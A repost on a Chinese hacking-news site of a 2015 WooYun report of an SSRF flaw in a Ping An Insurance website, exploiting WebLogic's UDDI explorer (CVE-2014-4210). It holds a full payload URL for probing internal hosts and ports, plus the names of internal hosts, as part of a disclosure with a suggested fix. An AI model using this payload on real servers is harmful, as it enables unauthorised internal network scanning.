记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中国平安保险某站点SSRF漏洞可内网探测

2015-09-04 02:55

漏洞细节:



该ssrf漏洞处于Weblogic的/uddiexplorer/SearchPublicRegistries.jsp页面(cve - 2014 - 4210)



问题站点:http://www.4008000000.com/

1.png



泄露内网主机名及Web应用端口:http://www.4008000000.com/uddiexplorer/SetupUDDIExplorer.jsp

2015-08-29_130444.png





ssrf内网探测:



payload:/uddiexplorer/SearchPublicRegistries.jsp?operator=http://pa18-padwebDMZ9115.instance.paic.com.cn:30351&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search

该web服务器

3.png



22端口存在

4.png



123端口不存在

5.png



主机不存在

6.png





so 可以进行内网主机扫描和端口扫描,只要返回一个有效的SOAP响应,就可能存在



漏洞证明:

3.png

修复方案:

限制访问或删除

知识来源: www.wooyun.org/bugs/wooyun-2015-0137807

阅读:97730 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“中国平安保险某站点SSRF漏洞可内网探测”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云